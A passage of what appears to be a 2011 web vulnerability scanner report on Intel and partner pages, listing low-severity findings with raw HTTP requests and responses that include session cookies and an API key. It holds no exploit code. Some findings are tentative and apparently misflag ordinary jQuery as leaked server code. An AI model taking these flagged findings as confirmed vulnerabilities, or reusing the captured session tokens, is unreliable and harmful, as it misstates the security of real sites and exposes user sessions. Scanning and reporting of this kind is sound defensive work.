Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G15
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:29 GMT
Date: Sat, 05 Feb 2011 23:18:29 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 47184

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input size="26" class="text" id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

13.28. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/software/partner/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL:
  • https://secure-swpartner.intel.com/login/login.aspx?Lang=ENG&qlogin=true&target=http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm?iid=subhdr ptr_sw_program
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /cd/software/partner/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:35 GMT
Date: Sat, 05 Feb 2011 23:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35227

...<html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><link href="http://cache-www.intel.com/plt/cd/software/shared/eng/css/v3.css" rel="stylesheet" type="text/css" xmlns:m
...[SNIP]...
<div style="float: left"><form method="post" name="loginform" style="margin-bottom: 5px" action="https://secure-swpartner.intel.com/login/login.aspx?Lang=ENG&amp;qlogin=true&amp;target=http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm?iid=subhdr ptr_sw_program">Existing Partners: Login to the Intel&#174; Software Partner Portal<br><input class="sectionBodyText" name="txtUserName" onfocus="javascript:loginfocus()" size="15" type="text" value="username">&nbsp; <input class="sectionBodyText" name="txtPassword" onfocus="this.value=''" size="15" type="password" value="password"> &nbsp; <input class="sectionBodyText" type="submit" value="Login">
...[SNIP]...

13.29. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/software/partner/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL:
  • https://secure-swpartner.intel.com/login/login.aspx?Lang=ENG&qlogin=true&target=http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm?iid=siteindex resller_software
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /cd/software/partner/asmo-na/eng/index.htm?iid=subhdr+ptr_sw_program HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G03
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:35 GMT
Date: Sat, 05 Feb 2011 23:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35232

...<html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><link href="http://cache-www.intel.com/plt/cd/software/shared/eng/css/v3.css" rel="stylesheet" type="text/css" xmlns:m
...[SNIP]...
<div style="float: left"><form method="post" name="loginform" style="margin-bottom: 5px" action="https://secure-swpartner.intel.com/login/login.aspx?Lang=ENG&amp;qlogin=true&amp;target=http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm?iid=siteindex resller_software">Existing Partners: Login to the Intel&#174; Software Partner Portal<br><input class="sectionBodyText" name="txtUserName" onfocus="javascript:loginfocus()" size="15" type="text" value="username">&nbsp; <input class="sectionBodyText" name="txtPassword" onfocus="this.value=''" size="15" type="password" value="password"> &nbsp; <input class="sectionBodyText" type="submit" value="Login">
...[SNIP]...

14. Source code disclosure  previous  next
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


14.1. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:11 GMT
Server: Apache
X-JAL: 3
Vary: Accept-Encoding
CacheHit: D=28931 t=1296947471749931
X-JSL: D=28940 t=1296947471749931
Content-Type: text/javascript;charset=UTF-8
Connection: close

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

14.2. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:11 GMT
Server: Apache
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=7121 t=1296947471855602
X-JSL: D=7127 t=1296947471855602
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 20313

(function(c){var a=c.scrollTo=function(f,e,d){c(window).scrollTo(f,e,d)};a.defaults={axis:"xy",duration:parseFloat(c.fn.jquery)>=1.3?0:1};a.window=function(d){return c(window).scrollable()};c.fn.scrol
...[SNIP]...
c=="undefined"){return false}fn=a.srender.cache[b]=new Function("obj",'var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push("'+c.replace(/[\r\t\n]/g," ").replace(/\"/g,'\\"').split("<%").join("\t").replace(/((^|%>)[^\t]*)/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...

15. Referer-dependent response  previous  next
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:
  • Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
  • Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
  • Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.



15.1. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Request 1

GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name=&width=223&connections=0&stream=true&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sat, 05 Feb 2011 23:13:26 GMT
Content-Length: 8544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d4dd996456fe2050151169" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">302,326</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></div></div></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div></div></div></div><div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div></div></div></div><script type="text/javascript">
Env={module:"connect",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_
...[SNIP]...

Request 2

GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name=&width=223&connections=0&stream=true&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sat, 05 Feb 2011 23:14:13 GMT
Content-Length: 8476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d4dd9c5a64c41772710193" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">302,326</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></div></div></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div></div></div></div><div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div></div></div></div><script type="text/javascript">
Env={module:"connect",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_
...[SNIP]...

15.2. http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=

Request 1

GET /cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg= HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:13:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1057
Content-Type: application/x-shockwave-flash

CWS.F...x.}U[w.U........ci...Z].2.4!...%.....V..k.9.i....._`...Z>.o..+.s.........o.}....<...w.(...=Nz    `x.h.....-s....... p...[..........z..t...B.8.<x..y.<
}...=.........y6....56.=.mk...o..E...'..
..a.H.........?..._x..Ag7.....A.Wh.../.%2%..xZ.{.-.......o../u*.`.>).....'..W.....<...i...n.A..2.;.q.BNH..+.......b.X: .<`...B O..A<.\. ..p.....<G*..r.....qz..Z..).WQR......N...%..V.n._.].m...^...%-E....._b$ku..4....}    .5l..oX%....$d.g.n...~.fRs}zF.T.aY%.qLJ
....^EF`S]......8.=Ju8:Th.a.h3.}.v.....s..#t<X,..?@..pd>....l.".N...;.O..59D.c....F.1.W.V..,vQ.@v....H.."D=.p.^.-q?s9.'.b..x=..#..F.*..M..T.WR0...].b/.+D~....*T.J..D&f..K@....[^I...UM..~.....f.?.5h"..=..JF.c.~. .$).5.-&....s.g..
....,H...KU...!V6P.!nd.)hI.U'....x..d    .:.~3.x....*...........F.6).....(..j.jd.%I.'.h......T...C/N.m..h....Y23....g3..z.AZUV.. >%'..W*i..9...T.1/\WbK...<g....il...i...].i5    j..Z.C..6..;&.Yy-..4'.h.=+W].....R5uv...16.....v]x...u.......xD..Zy}..l~....I....!.s..v..E.A(cR........+T.D|...g.+U...5Z....f.uZ.T...h.4..P..X..h..8..H..F.;bU.M,Gs.q.";.....{!}.h...z..../...}6..<Z.Z

Request 2

